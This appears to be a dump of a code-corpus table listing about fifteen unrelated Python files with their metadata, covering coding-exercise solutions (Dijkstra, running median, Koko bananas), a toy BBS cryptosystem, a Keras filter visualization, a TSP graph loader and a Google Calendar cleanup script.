blob_id stringlengths 40 40 | language stringclasses 1
value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30
values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2
values | text stringlengths 12 5.47M | download_success bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
5460325c907c6cb8dd4395aa2c9b634139593b29 | Python | Akazfu/Python-Rewind | /huawei/按身高体重排队.py | UTF-8 | 325 | 2.96875 | 3 | [] | no_license | n = '3'
height = '90 110 90'
weight = '45 60 45'
n = int(n)
height = [int(i) for i in height.split()]
weight = [int(i) for i in weight.split()]
id_ = [i for i in range(1, n+1)]
zip_ = zip(id_, height, weight)
id_list = [str(x)+' ' for x, _, _ in sorted(
zip_, key=lambda x: (x[1], x[2], x[0]))]
print(''.join(id_list))
| true |
43789bf1e44218a4dd8c0a8aaa5009243fed1318 | Python | qholness/HypothesisIntro | /Ship/__init__.py | UTF-8 | 1,609 | 2.859375 | 3 | [] | no_license | """
Mimick the stdout process of shipping
"""
from datetime import datetime
from time import sleep
import random
import sys
class It(object):
def __init__(self):
sys.stdout.write("Pushing silly phrases into containers...")
self.spin()
with open("Text/SC4LoadingPhrases.txt", "r") as phrases:
self.random_phrases = list(map(lambda x: x.replace('\n', ''),
phrases.readlines()))
sys.stdout.write("\n\t")
sys.stdout.write("Loading...")
self.spin()
sys.stdout.write("\n")
def bore_me(self):
with open('Text/atotc.txt', 'r') as atotc:
lines = atotc.readlines()
for _ in lines:
print(f"\t{_}")
sleep(1.5)
def spinner(self):
while True:
for _ in '|/-\\':
yield _
def spin(self, wait=10, load_rate=random.randint(1, 4)/10):
now = datetime.now()
calc_time = lambda now_time: (datetime.now() - now_time).total_seconds()
spin = self.spinner()
while calc_time(now) < wait:
sys.stdout.write(next(spin))
sys.stdout.flush()
sleep(load_rate)
sys.stdout.write('\b')
def run_random_process(self, wait=10):
position_choice = random.randint(0, len(self.random_phrases))
subprocess = random.choice([0, 0, 0, 1])
phrase = self.random_phrases.pop(position_choice)
if subprocess:
sys.stdout.write(f"\t\t{phrase}...")
else:
sys.stdout.write(f"\t{phrase}...")
self.spin(wait=wait)
sys.stdout.write("\n")
def entertain_me(self):
num_processes = random.randint(10, 20)
for _ in range(num_processes):
wait_time = random.randint(1, 4)
self.run_random_process(wait_time)
def run(self):
# self.entertain_me()
self.bore_me()
| true |
8a049285b55576673d1982dd7350cee3c80d863f | Python | ckdrjs96/algorithm | /baekjoon/삼성 sw역량테스트/bj17143.py | UTF-8 | 1,722 | 3.046875 | 3 | [] | no_license | import sys
def move(r,c,s,d,z):
# print(r,c,s,d,z)
if d==1 or d==4:
dir = -1
else: dir =1
if d==1 or d==2:
s = s%((R-1)*2)
for i in range(s):
if r==R:
dir = -1
elif r == 1:
dir = 1
r += dir
if dir ==1:
d=2
else: d=1
elif d==3 or d==4:
s = s % ((C - 1) * 2)
for i in range(s):
if c==C:
dir = -1
elif c == 1:
dir = 1
c += dir
# print(c)
if dir ==1:
d=3
else: d=4
return r,c,s,d,z
input = sys.stdin.readline
R,C,M = map(int, input().split())
board = [[[0,0,0] for _ in range(C+1)] for _ in range(R+1)]
for _ in range(M):
a,b,s,d,z = map(int,input().split())
board[a][b] = [s,d,z]
# print(board)
ans = 0
for c in range(1,C+1):
#2. 낚시왕이 있는 열에 있는 상어 중에서 땅과 제일 가까운 상어를 잡는다. 상어를 잡으면 격자판에서 잡은 상어가 사라진다.
for r in range(1,R+1):
if board[r][c] != [0,0,0]:
ans += board[r][c][2]
board[r][c] = [0,0,0]
break
#3 상어가 이동한다.
new_board = [[[0, 0, 0] for _ in range(C + 1)] for _ in range(R + 1)]
for i in range(R+1):
for j in range(C+1):
if board[i][j] !=[0,0,0]:
r, c, s, d, z = move(i,j,*board[i][j])
if new_board[r][c] == [0,0,0]:
new_board[r][c] = [s,d,z]
else:
if new_board[r][c][2] <z:
new_board[r][c] = [s,d,z]
board = new_board
print(ans)
| true |
a424f5e73856113e36f0d24142317451b14b7c0b | Python | yunfengzhou-hub/leetcode | /875-Koko Eating Bananas.py | UTF-8 | 982 | 3.09375 | 3 | [] | no_license | class Solution:
def minEatingSpeed(self, piles, H):
start=1
end=max(piles)
while end-start>=2:
center=int((end+start)/2)
tempH=0
for i in range(len(piles)):
tempH+=piles[i]//center
if piles[i]%center>0:
tempH+=1
if tempH<=H:
end=center
else:
start=center
print(start,center)
tempH=0
for i in range(len(piles)):
tempH+=piles[i]//start
if piles[i]%start>0:
tempH+=1
if tempH<=H:
return start
else:
return end
piles=[332484035, 524908576, 855865114, 632922376, 222257295, 690155293, 112677673, 679580077, 337406589, 290818316, 877337160, 901728858, 679284947, 688210097, 692137887, 718203285, 629455728, 941802184]
#H=823855818
H=823855818
mysolution=Solution()
print(mysolution.minEatingSpeed(piles, H)) | true |
0905e7f966494e1ccb426c07e0cb07f4457f5ba9 | Python | strong-Ting/practice-of-python-and-git | /pi.py | UTF-8 | 679 | 3.359375 | 3 | [] | no_license | import math
def estimate_pi():
k=0
now_k = 1
sum_k = 0
factor = (2*math.sqrt(2)) / 9801
while abs(now_k) > (1e-15):
num = fac(4*k)*(1103+26390*k)
den = (fac(k)**4)*(396**(4*k))
now_k = num /den
now_k = now_k * factor
sum_k = sum_k + now_k
k = k+1
return 1/sum_k,now_k ,k
def fac(num):
if num == 0:
return 1
else:
n = 0
ans =1
while num > 0 :
n = n +1
num = num -1
ans = ans * n
return ans
print(estimate_pi())
print(math.pi)
#if 1/estimate_pi() == math.pi :
# print("the same")
#else:
# print("no")
| true |
e1a7850164015733bb1c21c14d14ed99d43814e4 | Python | faker-hong/testOne | /人工智能/python人工智能深入/卷积层/conv_visualization.py | UTF-8 | 2,880 | 2.96875 | 3 | [] | no_license | import numpy as np
import cv2
import scipy.misc
import matplotlib.pyplot as plt
from keras.models import Sequential
from keras.layers.convolutional import Convolution2D
import matplotlib.cm as cm
img_path = '001.jpg'
# 下载图片
bgr_img = cv2.imread(img_path)
# 转换为灰度图
gray_img = cv2.cvtColor(bgr_img , cv2.COLOR_BGR2GRAY)
# 调整更小
small_img = scipy.misc.imresize(gray_img , 0.3)
# 缩放
small_img = small_img.astype('float32') / 255
# plot image
# plt.imshow(small_img, cmap='gray')
# plt.show()
# -----------------------------------------------------------------------------------------
# define filters
filter_1 = np.array([[-1, -1, 1, 1], [-1, -1, 1, 1], [-1, -1, 1, 1], [-1, -1, 1, 1]])
filter_2 = np.array([[1, 1, -1, -1], [1, 1, -1, -1], [1, 1, -1, -1], [1, 1, -1, -1]])
filter_3 = filter_2.T
filter_4 = np.array([[1, 1, 1, 1], [1, 1, 1, 1], [-1, -1, -1, -1], [-1, -1, -1, -1]])
filters = [filter_1, filter_2, filter_3, filter_4]
def show_filters():
fig = plt.figure(figsize=(10, 5))
for i in range(4):
ax = fig.add_subplot(1, 4, i + 1, xticks=[], yticks=[])
ax.imshow(filters[i], cmap='gray')
ax.set_title('Filter %s' % str(i + 1))
width, height = filters[i].shape
for x in range(width):
for y in range(height):
ax.annotate(str(filters[i][x][y]), xy=(y, x),
horizontalalignment='center',
verticalalignment='center',
color='white' if filters[i][x][y] < 0 else 'black')
plt.show()
# Visualize the Activation Maps for Each Filter
# plot image
# plt.imshow(small_img, cmap='gray')
# define a neural network with a single convolutional layer with one filter
model = Sequential()
model.add(Convolution2D(1, (4, 4), activation='relu', input_shape=(small_img.shape[0], small_img.shape[1], 1)))
# apply convolutional filter and return output
def apply_filter(img, index, filter_list, ax):
# set the weights of the filter in the convolutional layer to filter_list[i]
model.layers[0].set_weights([np.reshape(filter_list[index], (4, 4, 1, 1)), np.array([0])])
# plot the corresponding activation map
ax.imshow(np.squeeze(model.predict(np.reshape(img, (1, img.shape[0], img.shape[1], 1)))), cmap='gray')
# visualize all filters
fig = plt.figure(figsize=(12, 6))
# fig.subplots_adjust(left=0, right=1.5, bottom=0.8, top=1, hspace=0.05, wspace=0.05)
for i in range(4):
ax = fig.add_subplot(1, 4, i+1, xticks=[], yticks=[])
ax.imshow(filters[i], cmap='gray')
ax.set_title('Filter %s' % str(i+1))
# visualize all activation maps
fig = plt.figure(figsize=(20, 20))
for i in range(4):
ax = fig.add_subplot(1, 4, i+1, xticks=[], yticks=[])
apply_filter(small_img, i, filters, ax)
ax.set_title('Activation Map for Filter %s' % str(i+1))
plt.show() | true |
afa38dc53b39e2bf523ee1e7900eb21fb2cdd329 | Python | kaiwulf/crawler | /crawler.py | UTF-8 | 1,477 | 2.953125 | 3 | [] | no_license | import urllib3, re
from bs4 import BeautifulSoup
from csv import DictReader, DictWriter
# https://css-tricks.com/snippets/css/a-guide-to-flexbox/
# Using sample program from below to learn more about python webscrapping
# https://dzone.com/articles/webscraping-with-python-beautiful-soup-and-urllib3
class search:
def __init__(url=None, key_words=None):
self.url = url
self.key_words = key_words
class crawler:
def __init__():
pass
def get_book_data(filename):
titles = []
prices = []
def gdb_to_usd(amount):
return f's {round(amount * 1.21255), 2}'
for i in range(1,51):
url = f'http://books.toscrape.com/catalogue/category/books_1/page-{i}.html'
req = urllib3.PoolManager()
res = req.request('GET', url)
soup = BeautifulSoup(res.data, 'html.parser')
contents = soup.find_all(class_='product_pod')
input(type(soup.find_all()))
titles = []
for j in soup.find_all():
titles.append(j['title'])
pounds = []
c = []
for i in contents:
c.append(i.find().get_text())
for number in c:
amount = re.compile('[0-9]+.')
num = amount.findall(number)
pounds.append(float(''.join(num)))
temp = list(map(gdp_to_usd_rounded,pounds))
for t in temp:
prices.append(t)
res = dict(zip(titles,prices))
if 'title' in i.attrs:
input("title in attrs")
titles.append(i['title'])
pounds = []
c = [] | true |
b0255ae776c0a82e42aefe7afa9c88b631d0f50b | Python | kmustyxl/DSA_final_fighting | /NowCoder/Array_Sort/HeapSort_EXAM_Mid_number.py | UTF-8 | 3,643 | 4.03125 | 4 | [] | no_license | def Mid_number(arr):
'''
随时获取数据流中的中位数
首先,需要建立一个大根堆和一个小根堆。 实时保证大根堆和小根堆的平衡,数量差值不能大于1
大根堆存放数组中较小的部分,则堆顶就是较小部分的最大值
小根堆存放数组中较大的部分,则堆顶就是较大部分的最小值
:param arr:
:return:
'''
if arr is None:
return
Big_heap = [] #建立大根堆
Small_heap = [] #建立小根堆
mid_num_arr = []
Big_heap.append(arr[0]) #首先将第一个数放在大根堆中
for i in range(1,len(arr)):
if Big_heap[0] >= arr[i]: #如果数据流吐出的数字小于大根堆堆顶,则放入大根推
Big_heap.append(arr[i])
BigHeapinsert(Big_heap, len(Big_heap)-1) #调整大根堆结构,恢复大根堆结构
else:
Small_heap.append(arr[i]) #如果数据流吐出的数字大于大根堆堆顶,则放入小根推
SmallHeapinsert(Small_heap, len(Small_heap)-1) #调整小根堆结构,恢复小根堆结构
if len(Big_heap) - len(Small_heap) >= 2: #判断大小根堆规模差值是否大于1
swap(Big_heap, 0, len(Big_heap)-1) #如果大根堆超,则将大根堆堆顶弹出
heapsize = len(Big_heap)-1 #策略为:将堆顶与最后一个数交换位置
BigHeapify(Big_heap,0,heapsize) #在heapsize范围上恢复大根堆
remove_data = Big_heap.pop() #将弹出的堆顶数据放到小根堆
Small_heap.append(remove_data)
SmallHeapinsert(Small_heap, len(Small_heap) - 1)
elif len(Small_heap) - len(Big_heap) >= 2: #小根堆的处理与大根堆同理
swap(Small_heap, 0, len(Small_heap)-1)
heapsize = len(Small_heap) - 1
SmallHeapify(Small_heap, 0, heapsize)
remove_data = Small_heap.pop()
Big_heap.append(remove_data)
BigHeapinsert(Big_heap, len(Big_heap)-1)
if len(Big_heap) == len(Small_heap):
mid_num = (Big_heap[0] + Small_heap[0]) / 2.0
elif len(Big_heap) - len(Small_heap) == 1:
mid_num = Big_heap[0]
elif len(Big_heap) - len(Small_heap) == -1:
mid_num = Small_heap[0]
mid_num_arr.append(mid_num)
return mid_num_arr
def swap(arr, index1, index2):
temp = arr[index1]
arr[index1] = arr[index2]
arr[index2] = temp
def BigHeapinsert(arr, index): #大根堆插入新的数据,并与父代依次比较,找到合适位置
while arr[index] > arr[int((index-1)/2)]:
swap(arr, index, int((index-1)/2))
index = int((index-1)/2)
def SmallHeapinsert(arr,index):
while arr[index] < arr[int((index-1)/2)]:
swap(arr, index, int((index-1)/2))
index = int((index-1)/2)
def BigHeapify(arr, index, heapsize): #大根堆的调整是将最后的子代和栈顶交换位置,此时‘临时栈顶’小于后代
left = 2 * index + 1 #因次需要依次比较子代找到合适位置
while left < heapsize:
if left + 1 < heapsize and arr[left+1] > arr[left]:
lagest = left + 1
else:
lagest = left
swap(arr, index, lagest)
index = lagest
left = 2 * index + 1
def SmallHeapify(arr, index, heapsize):
left = 2 * index + 1
while left < heapsize:
if left + 1 < heapsize and arr[left+1] < arr[left]:
least = left + 1
else:
least = left
swap(arr, index, least)
index = least
left = 2 * index + 1
| true |
ac184daaef6801eef42c997761a509f5c993f32b | Python | persistforever/LeetCode | /Divide_and_Conquer/Count_Smaller_Numbers_After_Self.py | UTF-8 | 2,533 | 3.609375 | 4 | [] | no_license | # -*- encoding: gb18030
'''
315. Count of Smaller Numbers After Self
You are given an integer array nums and you have to return a new counts array.
The counts array has the property,
where counts[i] is the number of smaller elements to the right of nums[i].
Example:
Given nums = [5, 2, 6, 1]
To the right of 5 there are 2 smaller elements (2 and 1).
To the right of 2 there is only 1 smaller element (1).
To the right of 6 there is 1 smaller element (1).
To the right of 1 there is 0 smaller element.
Return the array [2, 1, 1, 0].
'''
import random
class Solution(object):
def countSmaller(self, nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
if nums == [] :
return []
self.array = zip(nums, range(len(nums)))
self.sorted_array = [None] * len(self.array)
self.count = [0] * len(self.array)
self.mergeSort(0, len(self.array)-1)
return self.count
def mergeSort(self, start, end):
mid = (start + end) / 2
if start != end :
self.mergeSort(start, mid)
self.mergeSort(mid+1, end)
self.merge(start, mid, end)
else :
self.merge(start, mid, end)
def merge(self, start, mid, end):
# print self.array[start: end+1]
i, j, t = start, mid+1, start
# print start, mid, end, i, j, t
while i <= mid and j <= end :
if self.array[i][0] <= self.array[j][0] :
self.sorted_array[t] = self.array[i]
self.count[self.array[i][1]] += j - mid - 1
i += 1
else :
self.sorted_array[t] = self.array[j]
j += 1
t += 1
if i > mid :
while j <= end :
self.sorted_array[t] = self.array[j]
j += 1
t += 1
elif j > end :
while i <= mid :
self.sorted_array[t] = self.array[i]
self.count[self.array[i][1]] += j - mid - 1
i += 1
t += 1
# print self.sorted_array[start: end+1]
self.array[start: end+1] = self.sorted_array[start: end+1]
n = 5
nums = list()
for _ in range(n) :
nums.append(random.randint(0,n))
random.shuffle(nums)
print nums
s = Solution()
s.countSmaller(nums)
print s.sorted_array
print s.count
| true |
ad3dcbf1796225a98194d7b95d7c2a80ee10deca | Python | jinurajan/Datastructures | /LeetCode/facebook/top_facebook_questions/vertical_order_traversal_of_binary_tree.py | UTF-8 | 1,732 | 3.984375 | 4 | [] | no_license | """
Vertical Order Traversal of a Binary Tree
Given the root of a binary tree, calculate the vertical order traversal of the binary tree.
For each node at position (row, col), its left and right children will be at positions (row + 1, col - 1) and (row + 1, col + 1) respectively. The root of the tree is at (0, 0).
The vertical order traversal of a binary tree is a list of top-to-bottom orderings for each column index starting from the leftmost column and ending on the rightmost column. There may be multiple nodes in the same row and same column. In such a case, sort these nodes by their values.
Return the vertical order traversal of the binary tree.
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
from typing import List
from collections import deque, OrderedDict
class Solution:
def verticalTraversal(self, root: TreeNode) -> List[List[int]]:
if not root:
return []
if not root.right and not root.left:
return [root.val]
level_order_map = defaultdict(list)
q = deque([(root, 0, 0)])
node_list = []
while q:
node, row, col = q.popleft()
if node:
node_list.append((col, row, node.val))
q.append((node.left, row + 1, col - 1))
q.append((node.right, row + 1, col + 1))
node_list.sort()
result = OrderedDict()
for col, row, val in node_list:
if col in result:
result[col].append(val)
else:
result[col] = [val]
return result.values()
| true |
cd394fc230d751a6d902a39f551cd5d466d54882 | Python | lzx3x3/Algorithm-CSE6140 | /Traveling_Sales_Person/Code/helpers/graph.py | UTF-8 | 2,710 | 2.875 | 3 | [] | no_license | import math
from copy import deepcopy
import networkx as nx
import numpy as np
import sys
inf = 10**10
class Graph:
def __init__(self, filename):
self.filename = filename
self.load_from_file()
def parse_GEO(self, node):
i, x, y = node
i = int(i)
PI = 3.141592
deg = int(x)
min = x - deg
lat = PI*(deg + 5.0*min/3.0)/180.0
deg = int(y)
min = y - deg
lon = PI*(deg + 5.0*min/3.0)/180.0
return i, lat, lon
def get_GEO_distance(self, node1, node2):
i, lat_i, lon_i = node1
j, lat_j, lon_j = node2
i, j = int(i)-1, int(j)-1
R = 6378.388
q1 = math.cos(lon_i-lon_j)
q2 = math.cos(lat_i-lat_j)
q3 = math.cos(lat_i+lat_j)
d = int(R * math.acos(0.5*((1.0+q1)*q2 - (1.0-q1)*q3)) + 1.0)
return i, j, d
def get_EUV_2D_distance(self, node1, node2):
i, x_i, y_i = node1
j, x_j, y_j = node2
i, j = int(i)-1, int(j)-1
xd = x_i-x_j
yd = y_i-y_j
d = math.sqrt((xd*xd+yd*yd))
return i, j, int(d+0.5)
def load_from_file(self):
nodes_list = []
params = {}
with open(self.filename, "r") as f:
line = f.readline()
while ':' in line:
key, value = line.split(':')
params[key] = value.strip()
line = f.readline()
line = f.readline()
while 'EOF' not in line:
n, x, y = line.strip().split(' ')
n, x, y = n.strip(), x.strip(), y.strip()
n, x, y = float(n), float(x), float(y)
if params['EDGE_WEIGHT_TYPE'] == 'GEO':
n, x, y = self.parse_GEO((n, x, y))
nodes_list.append([n, x, y])
line = f.readline()
dim = int(params['DIMENSION'])
graph = [[0 for i in range(dim)] for j in range(dim)]
self.city = params['NAME']
if params['EDGE_WEIGHT_TYPE'] == 'EUC_2D':
dist_func = self.get_EUV_2D_distance
else:
dist_func = self.get_GEO_distance
for node1 in nodes_list:
for node2 in nodes_list:
i, j, distance = dist_func(node1, node2)
if i == j:
distance = inf
graph[i][j] = distance
graph[j][i] = distance
graph = np.array(graph)
self.nxG = nx.from_numpy_matrix(graph)
for i in range(len(nodes_list)):
self.nxG.remove_edge(i,i)
self.G = graph
def copy(self):
return deepcopy(self.G)
def __repr__(self):
return repr(self.G) | true |
ebbc466dedbee4b4470eee39b19e78d81ab5d260 | Python | aayu3/PRNGs | /BBS Cryptosystem.py | UTF-8 | 2,978 | 2.765625 | 3 | [] | no_license | import time
import tkinter as tk
def binToString(binary):
sections = int(len(binary)/7)
ls = list(binary)
new = []
for i in range(sections):
temp = ""
for j in range(7):
num = i*7+j
temp =temp + ls[num]
if temp == "0000000":
break
new.append(binToLetter(temp))
return "".join(new)
def letterToBinary(char):
num = ord(char)
string = str(bin(num))[2:]
if len(string) < 7:
string = "0"*(7-len(string)) + string
return string
def binToLetter(strnum):
return chr(int(strnum,base=2))
def strToBin(string):
print("Converting to Binary!")
thing = list(string)
halfconvert = thing
nthing = []
print("".join(halfconvert))
for i in range(len(thing)):
st = letterToBinary(thing[i])
nthing.append(st)
halfconvert[i] = st
print("".join(halfconvert))
return "".join(nthing)
def encrypt(p,q, message):
n = p*q
binstring = strToBin(message)
blis = list(binstring)
if len(blis) > n:
print("The modulus is not big enough for this message")
raise OverflowError
else:
for i in range(n-len(blis)):
blis.append("0")
xz = ((n//2)**2)%n
xlis = [xz]
for i in range(n):
xlis.append((xlis[i]**2)%n)
elis = []
for i in range(n):
elis.append(str((xlis[i]+int(blis[i]))%2))
return [p,q,xlis[len(xlis)-1],"".join(elis)]
def qresidue(n,p):
r1 = (n**((p+1)//4))%p
r2 = p-r1
if (r1**((p-1)//2))%p == 1:
return r1
else:
return r2
def solveLinearReq(p,q):
remainderls = []
quotientls = []
numls = []
if p<q:
numls = [q,p]
a = q
b = p
else:
numls = [p,q]
a = p
b = q
rem = 1
while rem !=0:
rem = a - b*(a//b)
quotientls.append(a//b)
remainderls.append(rem)
a = b
b = rem
remainderls.pop()
s2 = 1
t2 = 0
s1 = 0
t1 = 1
for i in range(len(remainderls)):
temps = s2-quotientls[i]*s1
tempt = t2-quotientls[i]*t1
s2 = s1
t2 = t1
s1 = temps
t1 = tempt
if p<q:
return([t1,s1])
else:
return([s1,t1])
def isQR(n,p):
if 1 == (n ** ((p + 1) // 4)) % p:
return True
else:
return False
def genPrev(p,q,x,u,v):
n = p*q
xp = qresidue(x,p)
xq = qresidue(x,q)
xn1 = (xp*q*v+xq*p*u)%n
return xn1
def decrypt(p,q,xno,estring):
n= p*q
templis = solveLinearReq(p,q)
elis = list(estring)
u = templis[0]
v = templis[1]
xrevlis = [xno]
for i in range(n):
xrevlis.append(genPrev(p,q,xrevlis[i],u,v))
xlis = xrevlis[::-1]
olis = []
for i in range(n):
olis.append(str((xlis[i]+int(elis[i]))%2))
return binToString("".join(olis))
info = encrypt(31,23,"")
print(decrypt(info[0],info[1],info[2],info[3]))
| true |
10b78031094140d6c3aa4e3eafa889785a32ffcb | Python | AlanEstudo/Estudo-de-Python | /ex056.py | UTF-8 | 1,000 | 4.25 | 4 | [] | no_license | # Desenvolva um programa que leia o nome, idade e sexo de 4 pessoas.
# No final do programa, mostre :
# A média de idade do grupo.
# Qual é o nome do homem mais velho.
# Quantas mulheres têm menos de 20 anos
somaIdade = 0
mediaIade = 0
maisVelha = 0
nomeVelha = ''
menosIdade = 0
for c in range(1, 5):
nome = str(input('Nome da {}º pessoa: '.format(c))).strip()
idade = int(input('Idade da {}º pessoa: '.format(c)))
sexo = int(input('Sexo da {}º pessoa: \n[1]MASCULINO\n[2]FEMININO\nOPÇÃO:'.format(c)))
somaIdade += idade
if c == 1 and sexo == 1:
maisVelha = idade
nomeVelha = nome
if sexo == 1 and idade > maisVelha:
maisVelha = idade
nomeVelha = nome
if sexo == 2 and idade < 20:
menosIdade += 1
mediaIdade = somaIdade / 2
print('Média idade do grupo: {}'.format(mediaIdade))
print('Pessoa mais velha: {} com a idade de {}' .format(nomeVelha, maisVelha))
print('Mulheres com menos de 20 anos: {}'.format(menosIdade))
| true |
419b34ac3ba141db490f720552d418f3e3ddf5cc | Python | caffein123/project | /sosoclass/delete_event.py | UTF-8 | 2,382 | 2.640625 | 3 | [] | no_license | #!/usr/bin/env python
#-*- coding: utf-8 -*-
from __future__ import print_function
import datetime
from googleapiclient.discovery import build
from httplib2 import Http
from oauth2client import file, client, tools
# If modifying these scopes, delete the file token.json.
SCOPES = 'https://www.googleapis.com/auth/calendar'
def main():
"""Shows basic usage of the Google Calendar API.
Prints the start and name of the next 10 events on the user's calendar.
"""
# The file token.json stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
store = file.Storage('/home/soso/token.json')
creds = store.get()
if not creds or creds.invalid:
flow = client.flow_from_clientsecrets('/home/soso/credentials.json', SCOPES)
creds = tools.run_flow(flow, store)
service = build('calendar', 'v3', http=creds.authorize(Http()))
# Call the Calendar API
#now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time
now = datetime.datetime.utcnow().replace(hour=0, minute=0, second=0, microsecond=0).isoformat() + 'Z'
tomorrow = datetime.datetime.utcnow().replace(hour=0,minute=0,second=0,microsecond=0) + datetime.timedelta(days=1)
tomorrow = tomorrow.isoformat() + 'Z'
events_result = service.events().list(calendarId='s8hos5mvbudjmnj34b726nm8lc@group.calendar.google.com',
maxResults=100, singleEvents=True,
orderBy='startTime',q="소소클래스",showDeleted=True).execute()
events = events_result.get('items', [])
print(datetime.datetime.now())
if not events:
print('No upcoming events found.')
exit(0)
for event in events:
#print(event)
if event['status'] == 'cancelled':
id = event['id']
try:
title = event['summary']
except KeyError:
continue
print("삭제된 일정 : {}".format(title))
for i in range(0,12):
try:
service.events().delete(calendarId='qb2gfb6okeeob5s2qoh3hbiuj0@group.calendar.google.com',
eventId='{0}{1}'.format(id,i)).execute()
print('삭제중 {}'.format(event['summary']))
except:
pass
if __name__ == '__main__':
main()
| true |
1054134384ea34b8e2dbae9f05bd0cfbffb0cfb2 | Python | QQYES/Design_Patterns | /Adapter_Pattern.py | UTF-8 | 1,051 | 3.90625 | 4 | [] | no_license | class Duck:
def quack(self):
pass
def fly(self):
pass
class MallardDuck(Duck):
def quack(self):
print("Quack")
def fly(self):
print("I'm flying")
class Turkey:
def gobble(self):
pass
def fly(self):
pass
class WildTurkey(Turkey):
def gobble(self):
print("Gobble gobble")
def fly(self):
print("I'm flying a short distance")
class TurkeyAdapter(Duck):
def __init__(self, turkey: Turkey):
self.turkey = turkey
def quack(self):
self.turkey.gobble()
def fly(self):
for i in range(5):
self.turkey.fly()
def duckTest(duck: Duck):
duck.quack()
duck.fly()
if __name__ == '__main__':
duck: MallardDuck = MallardDuck()
turkey: WildTurkey = WildTurkey()
turkeyAdapter = TurkeyAdapter(turkey)
print("The Turkey says...")
turkey.gobble()
turkey.fly()
print("\nThe Duck says...")
duckTest(duck)
print("\nThe TurkeyAdapter says...")
duckTest(turkeyAdapter)
| true |
2db7eb3d3f0f569f85591473fd5cf09e29d1a8d4 | Python | KaiboLiu/CS519-010-ALG | /hw9/dijkstra.py | UTF-8 | 7,144 | 3.015625 | 3 | [] | no_license | '''
Developer: Kaibo(lrushx)
Email: liukaib@oregonstate.edu
Process Time: Mar 1, 2018
'''
from collections import defaultdict
import time
'''
class keyPQ(): # decrease-key priority queue
def __init__(self, h=[]):
self.heap = h # list of [weight, V] in heap
self.len = len(h)
self.popped = set()
self.idx = defaultdict(lambda:-1)
for i,(_,v,_) in enumerate(h): self.idx[v] = i
self.heapify()
def heapify(self):
i0 = self.len >> 1
for i in range(i0,-1,-1):
self.sink(i)
def push(self, item):
self.heap.append(item)
self.idx[item[1]] = self.len
self.rise(self.len)
self.len += 1
def pop(self):
if self.len == 0: return None
self.len -= 1
self.switch(0,self.len)
top = self.heap.pop()
self.popped.add(top[1])
self.sink(0)
return top
def sink(self, i):
l, r = i+i+1, i+i+2
if l >= self.len: return
if r >= self.len and self.heap[i][0] > self.heap[l][0]:
self.switch(i, l)
self.sink(l)
if r < self.len:
minChild = l if self.heap[l][0] < self.heap[r][0] else r
if self.heap[i][0] > self.heap[minChild][0]:
self.switch(i, minChild)
self.sink(minChild)
def rise(self, i):
if i == 0: return
parent = (i-1)>>1
if self.heap[i][0] < self.heap[parent][0]:
self.switch(i, parent)
self.rise(parent)
def switch(self, i, j):
self.heap[i], self.heap[j] = self.heap[j], self.heap[i]
self.idx[self.heap[i][1]], self.idx[self.heap[j][1]] = i, j
def decreaseKey(self, i, w, prev):
self.heap[i][0], self.heap[i][2] = w, prev
self.rise(i)
## O((V+E)logV), decrease-key heap
## 0.769 s on flip test
def shortest1(n, edges):
def solution(v, back):
if v == start: return [v]
return solution(back[v],back)+[v]
edge = defaultdict(set)
back = {}
for (u,v,w) in edges:
#weight[u,v] = weight[v,u] = min(weight[u,v],w)
edge[u].add((v,w))
edge[v].add((u,w))
start, end = 0, n-1
# init 1: put all the start's neighbors to the heap, and heapify, O(n1)
global npop, npush
npop, npush = 0, 1
h = [[0, start, -1]] #[dist, node, prev]
for v,w in edge[start]:
h.append([w, v, start])
npush += 1
q = keyPQ(h)
while q.len:
w0, u, prev = q.pop()
npop += 1
back[u] = prev
if u == end: return w0, solution(end,back)
for v,w in edge[u]:
w1 = w0 + w
if v in q.idx: # v in the queue and not popped yet
if v in q.popped: continue
if w1 < q.heap[q.idx[v]][0]:
q.decreaseKey(q.idx[v],w1,u)
npush += 1
else: # the rest nodes linked to u, which are not in the queue, q.idx[v] == -1
q.push([w1, v, u])
npush += 1
return None
## O((V+E)logV), decrease-key heap-dict from https://gist.github.com/matteodellamico/4451520
## a little faster than shortest1
def shortest2(n, edges):
import priority_dict
def solution(v, back):
if v == start: return [v]
return solution(back[v],back)+[v]
edge = defaultdict(set)
for (u,v,w) in edges:
edge[u].add((v,w))
edge[v].add((u,w))
start, end = 0, n-1
# init : put start to the heap, O(1), but push its neighbors later one by one, O(n1logn1)
dic = priority_dict.priority_dict() # dic[u]:(dist,u,last), means the dist from start to u, and last of u is last
dic[start] = (0,-1)
back = {}
global npop, npush
npop,npush = 0,0
while dic:
u, (w0, prev) = dic.pop_smallest()
npop += 1
back[u] = prev
if u == end: return w0, solution(end,back)
for v, w in edge[u]:
if v in back: continue # v not popped yet
w1 = w+w0
if v in dic and w1 >= dic[v][0]: continue
dic[v] = (w1,u)#dic.__setitem__(v,w1) # v in the queue, or v not visitted
npush += 1
return None
'''
## O((E+E)logE), heap
## 0.316 s on flip test
def shortest(n, edges):
import heapq
def solution(v, back):
if v == start: return [v]
return solution(back[v],back)+[v]
edge = defaultdict(set)
back = {}
d = defaultdict(lambda: 1<<30)
for (u,v,w) in edges:
edge[u].add((v,w))
edge[v].add((u,w))
start, end = 0, n-1
global npop, npush
npop,npush = 0,0
# init : put start to the heap, O(1), but push its neighbors later one by one, O(n1logn1)
h = [(0,start,-1)] # (dist,node,prev)
while len(h):
dist, u, prev = heapq.heappop(h)
npop += 1
if u in back: continue
back[u] = prev
if u == end: return dist, solution(end,back)
for v, w in edge[u]:
if v not in back: # v not popped yet
if dist+w < d[v]:
heapq.heappush(h,(dist+w, v, u))
d[v] = dist+w
npush += 1
return None
npop,npush = 0, 0
if __name__ == "__main__":
print(shortest(4, [(0,1,1), (0,2,5), (1,2,1), (2,3,2), (1,3,6)]))
# (4, [0,1,2,3])
print(shortest(5,[(0,2,24),(0,4,20),(3,0,3),(4,3,12)]))
#(15, [0, 3, 4])
import sys
import pdb
#sys.path.append("/nfs/farm/classes/eecs/winter2018/cs519-010/include")
